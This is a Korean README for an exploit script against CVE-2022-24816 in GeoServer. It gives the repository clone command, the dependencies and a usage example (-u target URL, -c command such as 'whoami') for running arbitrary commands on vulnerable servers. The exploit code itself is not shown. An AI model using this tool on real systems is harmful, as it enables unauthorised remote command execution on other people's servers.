
CVE-2022-24816을 대상으로 하는 GeoServer 공격 스크립트. 조작된 HTTP 요청을 통해 취약한 서버에서 임의 명령을 실행합니다. 의존성 관리 및 색상화된 출력을 포함합니다.
저장소 복제하기:
git clone https://github.com/c1ph3rbyt3/CVE-2022-24816.git
cd CVE-2022-24816
종속성 설치하기: Python 3가 설치되어 있는지 확인하세요. 그런 다음, 다음을 실행하여 필요한 종속성을 설치하십시오:
pip install -r requirements.txt
requirements.txt 파일에는 다음 라이브러리가 포함되어 있습니다:
requestsurllib3colorama-u 또는 --url: 취약한 GeoServer 서버의 대상 URL을 지정합니다. 예: http://example.com 또는 https://example.com.-c 또는 --command: 대상 시스템에서 실행할 명령어를 지정합니다.특정 명령어로 스크립트 실행하기:
python CVE-2022-24816.py -u https://vulnerable-geoserver.com -c "whoami"
이 작업은 악성 페이로드를 대상 서버에 전송하고 명령어의 출력을 화면에 표시합니다.
만든 사람: C1ph3rByt3